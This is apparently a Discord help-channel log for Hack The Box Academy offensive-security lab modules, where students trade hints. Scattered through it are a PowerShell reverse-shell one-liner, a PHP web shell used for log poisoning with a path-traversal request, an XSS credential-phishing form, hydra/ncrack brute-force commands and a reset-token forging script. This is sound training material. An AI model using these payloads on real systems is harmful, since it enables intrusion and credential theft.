#modules
greetings guys....
Hello, for the Password Attack Lab - Hard, I successfully got the VHD and its password.
However, how do I mount the VHD file?
I found the links on the HTB forum, but it seems they don't work for me.
๐ฆ
Anyone who is using Ubuntu 20.x and installed metasploit-framework via snap know how to install new plugins (the snap directories are read-only)?
Mount on a windows host
@fathom pendant Can I DM you?
Does someone know where I can download xfreerdp? I tried to install it with sudo apt-get install xfreerdp and it can't locate the package.
We need a lmchatgptfy.com website
to counter the lmgtfy.com
thanks bro
Google it
How do I upload with evil-winrm? I used the upload command but it's really slow
Either windows VM or if your host system is windows...
Did anyone finish the Linux Privilege Escalation - Miscellaneous Techniques? I need a bit of guidance in that section as I am unable to understand the concept in "Weak NFS Privileges"
Morning all, I am new to Discord, not entirely sure how to use it. I am completely stuck on the bug bounty path. I cannot get the OWASP ZAP HUD to work! When I try to toggle the break feature it simply will not toggle to On; it is like the button just does not work. I have contacted support who are useless! Any ideas please?
First: don't say support is useless;
Second: what module are you having issues with specifically, what version of ZAP are you running
The module is Using Web Proxies; the version of ZAP is the one installed on the Pwnbox. May I ask why not to call support useless? On this occasion, support pretty much dismissed my query like I was useless! Therefore my experience was not good! I am paying for a service and I feel the support is substandard!
"I have contacted support who are useless!". Mate, it's the weekend. Chill out
Hi guys. I'm struggling with the last question in FUZZ Web Application. I have created my ids.txt file and am trying to get the answer.
Using the Parrot PC in HTB is unusable in my view (some language/settings are really bad) when trying to use the online Parrot version, so I'm doing it from a VM at home.
The results I'm getting: I have either all or none of the IDs, and cannot see/figure out how this should be solved.
So I looked in the cheat sheet and verified that my command is the right one, and it is correct as far as I can see, but again I'm getting all 1000 answers back or none. So I cannot figure out this last command.
ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'KEYID=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -ft '<1000' which is the only difference in the 1000 numbers in the output. It gives me 10-20 numbers, but none of those are correct, so here I'm lost, since the only difference I see is Duration.
PS: interested in the right command to see the difference here, not the solution
ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:30437/admin/admin.php -X POST -d 'USER=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded'
Check if the parameter value is case-sensitive or not. If it is case-sensitive, then make sure that the words in the ids.txt wordlist match the case of the parameter value. You can try a different wordlist to see if you get any different responses
i hate my phone
Thanks. Since the parameter was found as USER (so the brain got stuck there)
MODULE: PIVOTING, TUNNELING, AND PORT FORWARDING skills assessment
Hi guys, I found the vfrank creds and was able to connect to the other Windows machine with them, but I can only see the same flags..
Any help? Can I DM someone?
@sinful olive yes
seems to be working
Try to fetch upload.php and read it. Understand the whole PHP file: how the uploaded file is being saved and what filters are in place
Everything you have read so far in the module is useful for the assessment, apply everything
Read the content type filter section again
and apply that in the skills assessment, you will get it
and don't get frustrated, it took me 4 hours..
Well, still a bit stuck here with this final flag in the module Fuzz Web Applications. So here's what I've done so far, after getting the right param and key.
The HINT: well, it says it's a flag in the HTB{VALUE} format. Reading the question, I thought the flag would be in that response when assigning the right param/key.
Curl the admin.php with the right param/keys --> shows the same code as the webpage, but no flag here. And index shows 0 bytes in content.
My scan for folders didn't show any other folders than http://admin.academy.htb:PORT/admin/ --> no subfolders
A scan for extensions .phtml .html .htm .phps .php found nothing other than php
Did a discovery with directory-list-2.3-big.txt & directory-list-2.3-lowercase-big.txt, only showing admin.php and index.php, and index.php is empty
Did a recursive scan for the flag, but it didn't show anything else than index.php and admin.php. Hmmm, I just can't see what I'm missing here or where to find this flag
XD
Hey guys, any pointer/direction would be well appreciated, since I cannot figure out where the final flag is. The instructions/final question say I should curl the answer, but I'm just getting source. I can't figure this one out
This is the final question, find the flag in the FUZZ Web Application. There's no flag anywhere in this command
curl http://admin.academy.htb:31288/admin/admin/admin.php -X POST -d 'user=4' -H 'Content-Type: application/x-www-form-urlencoded'
It'll be section 505, where the question is: Try to create the 'ids.txt' wordlist, identify the accepted value with a fuzzing scan, and then use it in a 'POST' request with 'curl' to collect the flag. What is the content of the flag?
Hi, I am just doing the skills assessment "Password Attacks - Easy Lab" and I can't get into FTP. Nmap shows 2 services on the host (ftp and ssh). I did password mutation based on the list and rules provided in the module resources. Crackmapexec can't find anything, and brute-forcing with hydra takes ages (even after filtering out passwords that have less than 9 characters). Please give me some guidance.
I am in with this --> curl http://admin.academy.htb:31288/admin/admin/admin.php -X POST -d 'user=4' -H 'Content-Type: application/x-www-form-urlencoded' - but I can't see/find the flag in that command
Yes, getting it decapriated in browser, and in the curl
So you are saying that such a command should work?
ncrack -U /home/kali/username.list -P /home/kali/unique_long_passwords.txt -T 5 ftp://<ip>
In both browser and curl, the only thing I can see is index and admin.php, but nothing in the index, and in admin.php a ping shows the right IP to look at, and the port is also up.
Have tried from both Mac and VM, getting the same page, and have respawned the server a couple of times
Found the name as USER yesterday, and had a hell of a time today until you talked about lowercase instead of the USER I found yesterday
Hmm, it seems it didn't find anything :/
It'd be too easy and obvious but... let me try
It requires user & pass
yup
So do you have any other ideas?
what about
ncrack -p 22 --user <username_list> -P <password_list> <target_ip>
Yes, I'm using the mutated pass list with the username list provided in the module resources
I did nmap -p- so I don't think there is something else
It defo isn't working. I am talking about the HUD that overlays a webpage and has buttons on the left and buttons on the right. The green off button just will not turn to on. Do support not open at the weekend? They are not replying to my query; if they are closed then that's why.
Not sure what you mean, but can you take a screenshot
Did you install the certificate? Pretty sure it doesn't work without it. Still, the hud is mostly useless, so I wouldn't even be bothering with it.
I did, yes. The articles I am reading online also say it's useless. I wanted to use it as I like to follow the articles in as much detail as possible; if I skip the HUD section of the module I feel I am cutting corners.
It's really just a slower way to do what you can already do through ZAP itself, and will clutter up requests. If you already understand how to do the same methods from just within ZAP, then you're not really 'cutting corners'.
And I say this as someone who exclusively uses ZAP instead of Burp.
ah ok that is good to know, thank you! Makes me feel better.
It definitely sounds like a good idea, but it just doesn't work great in practice. Most people seem to prefer Burp to ZAP anyway, so if that ends up being the direction you prefer, then none of this matters anyway.
yeah fair point
Anyone for this?
To determine the FQDN of a third vhost, you would need to know the specific domain or server configuration
Can I dm you?
okay
You can typically look at the URL. For example,
if the URL of the website is "www.123.com", then the FQDN would be "www.123.com".
I need a hint on AD Enumeration & Attacks - Skills Assessment Part I, has anyone finished this?
sure, what's the issue?
So I've looked through the history in chat here because I have the same issue regarding the Nessus Skills Assessment, and all I can say from the results is that this module is complete shit. What do you do to log in to Nessus?
here's the instructions,
Once logged in, perform a BASIC NETWORK SCAN (modify the scan template to scan ALL ports, leave all other options the same) against the target: 172.16.16.100. Additionally, set up the scan to be authenticated using administrator:Academy_VA_adm1! as the credentials.
Authenticate to 10.129.202.116 with user "htb-student" and password "HTB_@cademy_student!"
What is the name of one of the accessible SMB shares from the authenticated Windows scan? (One word)
As you can see in the screenshots, Nessus is not on the 10.x box, and I cannot connect to it from either a spawned instance or my box with VPN
no idea what you are talking about
Hey is there anyone self learning cybersecurity without any degree?
yea
Where did you start from? I'm new to self-learning cyber sec
tryhackme and HTB Academy
Mmm I'm just thinking about learning things for free
Tier 0 modules are free and there are free rooms on THM, but you're gonna want to get a cert of some sort and going through that is going to cost something. YouTube university is good but not this good
YouTube is free; TryHackMe is great for learning the foundations
HTB is way harder and not as newbie friendly
@analog tendon how did you manage to get your "Academy user" role? I can't find it on the academy site
Hey, I was at the Attacking SAM section of the Password Attacks module. I was trying to transfer the system.save file via Impacket's smbserver.py but it says it failed, while the other two, security.save and sam.save, were transferred easily since they were small in size. Any alternatives?
Good evening. Attacking Common Services easy challenge. I got a username through smtp-user-enum, tried hydra on all open ports, used the pw list from the resources tab and rockyou.
Is brute forcing a pw the correct next step, and if so, should I get a hit with hydra when I specify the username as f**** and the pw list rockyou on FTP?
Thanks in advance.
If you're paying for the academy there is a Discord token in your account settings around the OTP token
I see, thanks. Only paying for regular at the moment, too bad :p
I want to say the tokens are the same and once you pay for academy it shows up, but IDK, only doing academy atm. I know it has my HTB rank but I don't remember if I verified it or not
I bought some cubes earlier so I think you need a real subscription. Saving up for the Silver one, it's a tough price as a student but well worth it imo :p
Agreed. I used my tax return money to pay for the year. It's gonna pay off
Glorious tax returns, maybe that's where I'll get my funding too lol
I seem to be stuck on the Passwd, Shadow & Opasswd section. I don't know if I'm going in the right direction or what the next move is. I found some SSH keys in one of the users' hidden directories but these keys have a password and I can't seem to find that password. Anyone know where to go from here?
Hello again people, I was doing the Password Attacks hard lab module but I'm still stuck trying to crack Johanna's pwd (mut_password), with no results. Can you please give me a hint on how I need to start? I followed all steps to get results, but in the last step the machine doesn't match any result or shuts down because the indexing time is too long.
the password for that user is rather easy and can be found in the list you mentioned
Seems like you have to pass it to 2john
Sorry, should've updated. I did do that and found the password for it. Signed in using the SSH key but I am now stuck there. Can't use any sudo and still can't view those files
Maybe that user has those bak files in a different directory
I'll look into that next. Thanks for the nudge
OMG, I should've looked at that. I did see she went there in the bash_history
Yes, I know, but the procedure is still executing with no results even after following all the steps one by one.
Give yourself a break, come back and re-think whether you can approach it differently or whether there is something you are not doing correctly; not every time (every exercise) are the commands exactly the same
ok, I'm going to try another way
maybe that works
thanks
In the Web Attacks module, Advanced File Disclosure section, I'm struggling to understand HOW the error method works. Can anyone explain this in detail?
Basically, you will trigger the first XXE that will load the file (.dtd) you are hosting, which again contains XXE code. In the email field that you can manipulate you are calling the entity from your .dtd file, which will execute the code
Hi, I am new. Can someone help me to know about server..
oh sorry, you mentioned error method
For the error method, if you focus your attention on the local DTD file, think of it like it will execute from last to first
Hey everyone, I'm stuck at the File Inclusion Skills Assessment. I have found the ||access.log|| file but can't upload the PHP code to get command execution. Can someone please help?
@everyone hey guys
Hi, I'm stuck on the "Attacking Common Applications - Attacking GitLab" module. I only have the user to find... the enumeration script works, it finds me 5 users, but not the one requested :/.
Also, the given address (gitlab.inlanefreight.local) redirects to port 8180, while GitLab is on port 8081. I don't know if it's supposed to be the case or if it's a mistake ^^
I'm on module 147 section 1327. It's the Password Attacks / Network Services section. I've answered the first 3 questions but I'm stuck on the last one. It's the SMB service. I've tried both Hydra and Metasploit. I can't seem to find the right username and password. Has anyone had an issue with this question?
Hydra is a way, but I used crackmapexec
I tried crackmapexec as well. I think the issue is that I can't seem to find the right username. I looked in the user files of the machine I was able to RDP into and that didn't help either. Any suggestions?
Are you trying one username at a time or using them within the list? If you run the list against the machine along with the pass list it should pop up
Okay, I'll give that a shot. Thank you!
Anyone who can help me with skills assessment on file upload attacks?
Pretty stuck on trying to get an initial footing. I'm not sure where my uploaded files go or how to figure that out. I did find the JavaScript code sending to upload.php, but not sure how that helps. I've tried to use an SVG / XXE payload to view the source to get the location, but I'm unsure how to make the payload work without being able to view the image. I wiped out the JavaScript/HTML error checking to push an SVG in, but I get an internal server error when I do that. I could presumably start trying to play with other types of attacks, but without knowing where the images are stored, even if successful I don't know how to execute them
Greetings everyone,
As a subscribed member of HackTheBox, I am an experienced SOC analyst seeking to enhance my abilities. After exploring the website, I am curious to know if HackTheBox offers any blue team content. Thank you for your time.
The academy has a couple of defensive modules, but if you're experienced you may already have those down
When popping up the Impacket smbserver for the file transfers module, I'm not sure where this share is created. I run the command "sudo impacket-smbserver share -smb2support /tmp/smbshare" in the same working directory as the file I want to move, and then on the Windows target I run "copy \\<attacker_ip>\share\<file_name>" and it gives me an error that the file was not found. Anyone know where the file to move needs to be located on the attack machine for the target to be able to grab it?
it creates it in the /tmp/smbshare folder
Also, blocking your code between `` like this will keep it from removing some of your \
because I take it you put copy \\attackerip\share\filename
so if the file isn't in the /tmp/smbshare directory it's not found
You can create the smbshare in any directory with /path/to/folder, or ./ which tells it to do it in this directory
How do you get started?
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
@fathom pendant Now with the smbshare created, I don't see anything within /tmp called smbshare. Will I not see it?
Then it's probably not a directory there
That's why (for practice) you should just do it in the local folder where you have the file you want to transfer
Ah, I see, the folder needs to be pre-existing, didn't catch that part. Thank you
Got it - thanks again!
Can I get help with smbclient and how to get the password.
I type in
"smbclient -U bob \\ip\users
Enter workgroup\bob's password:
then what do i do next
If I press enter:
"session setup failed:NT_status_logon_failure
Getting started: Service Scanning
Try specifying the IP before the Username - smbclient \\\\<ip_address>\\$share -U <username>
that's not the issue
The issue is what do I type in, or even how to get to a point where I can type in smb:> ls
If I press enter it gives a logon failure
Module: Footprinting, Footprinting Lab - Easy. Two questions. One, I tried different wordlists to brute-force the FTP credentials but all of them failed, so I ended up using the hint. Was anyone able to brute force this? Question 2, I tried to access the FTP server on port 21, port 2121 and without indicating a port, but I can't run any cmds on it. I get the following: Does anyone know how to bypass it?
so do I look at module footprinting?
What are you putting in for Bob's password?
The issue is I can't type anything; it doesn't allow me to input anything for some reason
If you start typing a password when it asks you for the password, it won't show you actually typing in the password. Just type it in and hit enter
@dim wigeon did that work for you?
Guys, it's been two days now. Until this module I always solved everything and I'm a little desperate right now; if anyone helped I would really be thankful
Nope, it still comes up with logon failure
even if I input help, ls, > ls
Also thanks Kraxxten btw for helping.
I'm talking to people from HTB now and I'll see what they say
yes please
Does the module give you a password for Bob?
Nope. You are supposed to acquire it and get through a file
That module. Last question.
Did that work?
Read the section carefully, you are given Bob's credentials
look for the green text
MarcieLee can you help here?
I haven't done file inclusions
Ok thanks anyway
Yeah, that's what the guy from HTB said. Working so far
Sup guys. Can anyone tell me what exactly the "lab exercise guidance" is on the silver annual subscription
Anyone assist with this pass the hash? Last question, getting a reverse shell from DC01 to MS01. I've gotten the command for the PowerShell to send the shell and it responds as expected, but my listener doesn't show a connection. I've verified I'm using the internal IP, verified the ports, have the listener running constantly, and I've used the different versions of the PowerShell reverse payload using base64 encoding
You're looking at it, buddy. But you can also hit request help on the questions if you're having trouble and one of the guys will DM you
Ooh thanks... I was thinking it would be kind of individual help they'd provide
They do if you request it from the course questions
But sometimes it's faster to ask people who have already been through it
Not every time, just sometimes
Do you know if any of the monthly subscriptions come with direct access to all tier 2 modules?
or just the student subscription
That silver annual is too expensive for my wallet lol
Expensive? Yes. Worth it? Depends on how you look at it, but I say yes
Don't know if it is actually worth it
Silver annual also gives you a ticket for an attempt at the exam
I mean... maybe it is better to invest in cubes and the certification separately
Annual also comes with a voucher for an exam
It can be, depending on how long it takes you to get through the course
I have a life and kids so I can't always go through this stuff, so having a whole year to be able to go through it works for me
h0gbyte, maybe you can help here, I'm going crazy with this File Inclusion module
Hey all. I'm working on the sqlmap module's skills assessment and I'm a bit confused. As far as I can tell, there aren't any forms or other inputs that actually process input data, just a bunch of dummy forms. Am I on the wrong track or just missing something obvious?
I haven't been through that part just yet, but is it local or remote? From your question I'm assuming local
Try to mess around with ||/proc/self/environ||
It's the last section, the skills assessment, and yes, I'm trying local
I think I will go for one of the monthly subs and buy an exam ticket separately :/
yeah
¯\_(ツ)_/¯
Can you share the section link?
But it would be more expensive... I can use the subscription while I do all of the pentest path and then cancel the sub if I won't do any other course
Yeah, I considered it myself but figured annual would be better for me. Plus tax returns helped me a lot
Yeah... anyway, thank you guys. I will give it a little bit more thinking
Get back to you when I've decided
Who knows, maybe I get financial aid from my company lol
Can you share the shell you're using?
or
specifically the command you're using
After loading the Invoke-TheHash module I used Invoke-SMBExec <target info>, then this command from the reverse shell generator
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("172.16.1.5",8001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Of course base64 encoded, and I've tried just about every flavor
I would have pasted the actual command but time ran out so my connection closed
Are you using Invoke-WMIExec?
WMIExec doesn't go through
is this the server for that? 
Unfortunately nothing we can do, homeslice, just make a new account
Or contact Spotify support
mine worked with wmiexec
I'll try it again. It just didn't respond the first few times but SMBExec did
Did you mean from the ||ilf_admin|| page or the normal one? In the first I don't seem to get anything useful
when using wmiexec it gives me the "Process did not start, check your command" response
In the second I get "invalid input detected" but haven't tried all the bypasses from the lessons
you might be using the wrong command
dm me if u cant get it
i would say its a bit outside of the module
the Invoke-WMIExec?
or the reverse shell
I've tried with 4 different reverse shells
all PowerShell though
Yes, I have done this. I was using port 443, since it is a commonly used port. Maybe I'll try using other ports?
wmiexec
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#lfi-to-rce-via-procfd
Try the /proc/self/environ from there, though you need to change things a bit
Try to do the wmiexec properly; I used the base64 shell
DM me if you can't figure it out
I got it. And I'm about to punch my monitor for missing something so small
I change the ||user-agent||, right?
I didn't put the command in the " "
yeah
that happens
i know
Usually I would think of it but for some reason it just slipped me. Thanks though
I was stuck in a skills assessment for 6 hours cuz I missed a "&"
shiiiit
np anytime
But where do I put the actual command? Right after the ||environ as in environ&cmd=id||
try to find where the output gets displayed
Ok I'm on it
Still nothing. Doing all this with Burp is right? I'm starting to doubt it
Read through the section in the module relevant to your question again and you'll find the piece you are missing
booted
I eventually figured it out. In case anyone else gets stuck, keep looking for page functions that do interact with the backend.
From where can I learn ethical hacking
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
@craggy forge ^
Hey, sorry, I went to bed. DM me
I saw the example online; some people use meterpreter> and I use msf>. I want to ask if it is not started with msfconsole?
lmao
meterpreter means that you got a session, a shell of the targeted system, which means you can run commands
Meterpreter is an attack payload which provides an interactive shell
to the attacker from which to explore the target machine and execute code
That is, if I get a reverse session now and I'm using it, then my shell will become a meterpreter and I can use the corresponding commands, right? @rustic sage
Like if you got a Linux system reverse shell you can only run Linux commands, and if you got a Windows system reverse shell you can run Windows commands
I hope you understand
I think I get it, thank you very much for the explanation, it's really easy to understand! @rustic sage
Thanks. Are you attempting to pwn machines right now on HTB?
Let's try and keep this channel on-topic for the HTB Academy modules
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
general chat?
You have to verify your main htb account in #bot-commands to access it
As stated in #welcome
Yes, I'm still learning. There are just some details that I didn't thoroughly understand at the time of study. @rustic sage
What happens after you run mstsc.exe from an elevated cmd prompt and then run
netstat -na | findstr /c:"3389"
Aah, never mind, best of luck
Is there a process to submit (typically minor) issues with HTB Academy module content?
#858470491676737536 and check the prior messages for the format
any hints on windows privilege escalation skills assessment II question 2? Escalate privileges to SYSTEM and submit the contents of the flag.txt file on the Administrator Desktop
How can I move a file from Windows to my local system? python -m http.server doesn't work
Use RDP with a network drive:
xfreerdp /v:10.129.211.17 /u:'htb-student' /p:'HTB_@cademy_stdnt!' /drive:linux,/home/kali/ctf
Thanks!
And if rdp isn't enabled?
• sudo impacket-smbserver share -smb2support /tmp
copy "\\192.168.220.133\share\nc.exe"
Thanks!
If you're using evil-winrm, you can use the command 'download'
Thanks for this. I copied it from the target machine and used echo -n 'asdfasdf' > hash.txt to add it to a file without newlines
I'm still stuck on the ||imap|| section of the Footprinting hard lab. I'm in ||tom's email|| and there are ||4|| folders. I used ||A1 FETCH 1:* (FLAGS) and A1 UID FETCH 1:* (FLAGS)||; they all either return an error or nothing. I have no clue what to do. Is there a second community maybe? The forums didn't mention anything about it.
The only notable return was in ||inbox, a1 fetch 1:* (FLAGS) returns this 1 FETCH (FLAGS (\Seen)), i tried A1 FETCH 2 body[] and it returned just errors||. I would appreciate it a lot if someone could help me a little
what is the error
||A1 BAD Error in IMAP command FETCH: Invalid messageset (0.001 + 0.000 secs).||
@subtle glen https://www.atmail.com/blog/imap-commands/ go to this website and look at the fetch section
Use one of the RFCs
That's what I did
How do I log onto another computer in AD?
PSRemoting?
Struggling on the really easy stuff as usual.
Broken Auth - Weak Brute Force Q2
It seems like we should be using an X-Forwarded-For 127.0.0.1 header with the brute forcing thing.... not understanding why this isn't working and what I might be missing in my understanding of what's wanted here..... seems very straightforward and obvious
headers = ||{"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36","X-Forwarded-For": "127.0.0.1"}||
Got it..... I'm dumb.......
do I need to use linux only
preferably
One of the fastest methods for getting up and running with Kali Linux is to run it "live" from a USB drive. This method has several advantages:
It's non-destructive - it makes no changes to the host system's hard drive or installed OS, and to go back to normal operations, you simply remove the Kali Live USB drive and restart the system. It's port...
Hi! I am working on Windows Privilege Escalation Skills Assessment - Part I
I can't find a way to make the potato work, tried everything I could think of! All the CLSIDs found by my scripts failed
Can someone help me? That's the first time I encounter this many issues with a potato
Please help me, I need help in Windows Privilege Escalation Skills Assessment - Part II
If anyone completed this module please DM me
In Password Attacks - Credential Hunting in Linux, I tried brute forcing every service with every username and password from the resources list
but I can't get in
Balena etcher?
what?
What's the actual question here?
which section are you working on
Why the first 70k? I've seen most people do the first 17k, not 70
Oh, or 17k, my fault
or filter out words starting with 'B' and use them
yeah it should start with a b
B
But coming back to my problem on Credential Hunting in Linux: I can't get on the machine. I brute forced every service but nothing is working. Maybe someone can push me in the right direction
Is that from the AD Enum and Attacks module
No
no password attacks
Pass attacks
You've used the mutated wordlist yeah?
have you checked the hint as well?
That's a password that you can mutate
The hint is to help you make a narrower pw mut list
So again, this seems insanely easy to fuck up but here I am. Broken Authentication - Predictable Reset Token
We are copying a linked CVE which is (username+epochtime) encoded with MD5 and submitted.
But they exist within the large list
Like I don't get how I could spend this long doing this and just get wrong answers
We have a time stamp.....
We have a converter to epoch time ......
We have md5 hash generator.....
We have somehow gotten the wrong answer.......
```
Vendor: The Apache Software Foundation
Versions Affected: Apache OpenMeetings 1.9.x - 3.1.0
Description:
The hash generated by the external password reset function is
generated by concatenating the user name and the current system time,
and then hashing it using MD5. This is highly predictable and can be
cracked in seconds by an attacker with knowledge of the user name of
an OpenMeetings user.
All users are recommended to upgrade to Apache OpenMeetings 3.1.1
Credit: This issue was identified by Andreas Lindh
Apache OpenMeetings Team
```
thanks guys that worked
am I just having a formatting problem I dont understand what can possibly be wrong here when its so laid out....
Has anyone finished AD Enumeration & Attacks - Skills Assessment Part I?
Just use a goddamn .bat shell ....
Hello guys i am having a problem with this module
https://academy.hackthebox.com/module/31/section/390
When i try to run this command in the debugger: `run $(python -c "print '\x55' * 1200")`
I get this error
```
Starting program: /home/gem/bow32 $(python -c "print '\x55' * 1200")
  File "<string>", line 1
    print '\x55' * 1200
    ^^^^^^^^^^^^^^^^^^^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(...)?
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Program received signal SIGSEGV, Segmentation fault.
0xf7e1df2c in ?? () from /lib32/libc.so.6
```
This is because in Python 3 print uses () and here it is without, but i cannot find a workaround...
Can you help
Hi all
I tried to complete the skills assessment in the pivoting,tunneling module
I am stuck after getting the lsass file and discover the user v**** but impossible to crack the hash with classics wordlists.
I discover the second server with the IP 172.16.6.* but impossible to log in rdp with mlefay (and i dont have the v*** 's password ^^)
I also tried to set a netsh on the first windows srv but nothing works...
Please if someone can help me it will be very appreciated
Thanks
Take a closer look the password may be right in plain sight
the melfay pass ?
The v*, you dumped the lsass/secrets yeah?
yes
i found a NT hash but impossible to crack
i dumped the lsass manually and read it with pypykatz
oh damn !!!!!!
What happened!?
thanks !!! why did i miss it when it is in the middle of my face ^^
sorry ^^ just found the answer i have been looking for since 2 days and it was just written in the middle of my screen
Most frustrating thing in the world to have what needs to be done explained and then you follow it and are told you're wrong
aaha
Hi,
I think i have a problem with the password mutation section in password attacks module.
I created the mutation of the word list but since this morning it is running, I had to restart the machine many times.
There is no complexity at this level and i use the lists given in the resources
Here are my commands:
```
hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
hydra -l sam -P mut_password.list 10.129.128.227 ssh -t 4
```
I lost another whole day for nothing on brute force...
-t 4 is default , u dont have to use this default value i would say
Ok thanks I restarted without this option but I'm afraid the server will stop the connection for too many bad attempts
I don't have FTP server on the machine.
Are you talking about this section?
https://academy.hackthebox.com/module/147/section/1391
can anyone provide me the best wordlist for subdomains enum?
Oh yes, sorry, I got confused with the nmap in the previous section ...
Well, I'll try again in ftp because yes it's too long in ssh.
It's really a problem to waste so much time for brute force or we learn nothing.
Try a different service
Ssh is super slow and forces a 4 thread
I'm on the ftp and I got a little hint that reduces the brute force to 10min.
So normally it will be good quickly!
Academy - Windows Privilege Escalation - Pillaging
I'm having difficulties to submit the Administrator hash .. I restored the back up files and dumped hashes using samdump2 and got the administrator hash but whenever I submit it .. It's wrong
In the Documentation and Reporting Module, under resources these is a .ZIP file with a sample report. I either missed the password for it or it is not listed. When I go to unpack the zip it asks for a password. Can someone help me out with that password? Thank you!
I just completed I used ftp with 64 threads ,4 is too slow
samdump2 gave different hashes than running secretsdump .. solved
but i want to know why ?
Yes is good i found it !
Thanks for reply
hi guys i am in "password attacks module : Attacking lsass" .. when i am using "pypykatz lsa minidump /home/htb-ac698971/lsass.dmp" it says bash command not found. I tried installing pypykatz it gives a lot of errors. Can someone help me?
what kind of an error are you getting when you try to install it
I shared you ss on personal chat
hey guys idk how to connect wifi to my workstation i cant open firefox
if you are a free user, then you don't have access to the internet on the workstation
Hi folks, last couple of times whenever i spawn target machine, it generates some random pub IP with a special port, is this new change or what? i cannot ping it or access it
thats a docker target which can be accessed over the internet, you need to think of a better approach than to ping it
you can access it in a browser
I cannot get a valid return and dont have any idea why
would love some help if possible
```python
import requests
from hashlib import md5   # missing from the paste: md5() is called below but was never imported
from sys import exit

url = "http://<IP>/question1/"
now = int(861000)          # epoch timestamp the reset token is assumed to be built from
start_time = now
fail_text = "Wrong token"  # string the page returns for an invalid token
user = "htbadmin"
endtime = now + 1500

# try every candidate timestamp in a +/-1500 s window around `now`
for x in range(start_time - 1500, endtime):
    raw_data = user + str(x)                       # token input: username + epoch time
    md5_token = md5(str(raw_data).encode()).hexdigest()
    data = {"token": md5_token, "submit": "check"}
    print("checking {} {}".format(str(x), md5_token))
    res = requests.post(url, data=data)
    if fail_text not in res.text:                  # anything other than the failure text is a hit
        print(res.text)
        print("[*] Congratulations! raw reply printed before")
        exit()
exit()
```
(6 hours on this single question) Have read through the Broken Auth thread and still no juice
Thanks. Spent about an hour on this, but with your comments, i knocked it out in five seconds.
You ever figure this out?
hey guys where is the password for Kerberoasting module
i have not been able to login with GetUserSPN
The password file comes in handy in a later section
I feel like my password file is messed up. If you still have it, would you mind sharing the sha256 hash of yours?
Not at my computer ATM, but which file do you mean? The password.list from the resources?
No worries, I meant the mutated password list
Hello can i ask a question regarding XSS Phishing module?
I am using this xss payload provided from the module
```
document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');
```
however i kept getting ');'> at this end
is there any problem with this?
If you mutate the password from the custom.rule from resources you should be fine
if you're trying to phish a user you might not want that visible. you can rectify this by ||starting a comment at the end of your payload||
ty! i was able to solve it
yo in Attacking Enterprise Networks
i need some help
on the Active Directory Compromise part.
having problems with a tool. need help asap
nvm got it
got a workaround
anyone can help me out on the osticket part of the attacking common apps module?
idk why the exploit chain just not clicking for me
idk what they are looking for here
did you get this?
can i dm you
Yea
@acoustic owl maybe?
Don't just ping people randomly dude
Depending on how long you've been working on it take a step away and come back later
i can't tell if it really wants me to dehashed.com inlanefreight.local or not
Hey all, thoroughly enjoying the penetration tester path. Can't imagine a better education. I had a question on the "Attacking Common Services" module, "Attacking RDP" section for anyone who knows the answer. For a PtH attack, is it possible to enable Restricted Admin Mode before gaining access to the victim host in any way? Or is it only something done after, using an alternative protocol like SSH, etc and then RDPing over
si
from my understanding as long as you have some RCE enabled you can do it
you don't need a shell or a login
could be enabled through a webshell
(evil) WinRM
Password Attack : Lab Medium
I just cracked the password of the docx file, How do i open the file in my linux box with that information?
i used kali linux and got libre office
on pwnbox i dont know
Footprinting module lab easy. || i've connected to the ssh server with the private key i got off the ftp server, but I cant find the flag.txt on the ssh server and ls, dir, etc. return nothing||
Nvm
Found it
wow.. All this time I thought i had libreoffice in my vm, it was actually never there and no file will open
sudo apt update
sudo apt install libreoffice
yea just installed it. thanks
Can someone tell me a story about how they were doing good then suddenly came up against a wall and felt like they were stupid for having to use hints or ask on discord often then eventually became better and is now an op l33t h@x0r?
ask me next year
I am having a ton of trouble with the final assessment for File Inclusion / Skill Assessment
I am attempting to poison the logs in burp and can see that I can write a user-agent, but after that when I go to put this into the user agent.
||`<?php system($_GET["cmd"]); ?>`||
and this for my get statement
||```
GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log&cmd=id
```||
Nothing shows up
has to do with quotes
play around with your quotes on the payload, it breaks it sometimes.
I also did single around cmd
How far are you in this lab?
im trying to crack johanna password in passwords attacks lab hard but i never get it. what am i doing wrong?
So I'm trying to figure out WHY I am able to issue commands via an anonymous bind through rpcclient. I have a Windows 2016 VM spun up. On the VM I can NOT issue any commands; I get "result was NT_STATUS_ACCESS_DENIED". I already asked chatgpt and found a couple GPOs that may restrict commands over anonymous binds, but NONE of them are enabled or even configured on the VM. So my question is: Does anyone know the exact GPO/setting on Windows Server 2016 that allows one to authenticate anonymously, but restricts issuing commands?
||```
GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log&cmd=id HTTP/1.1
Host: 178.62.8.249:31685
User-Agent: '<?php system($_GET["cmd"]); ?>'
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
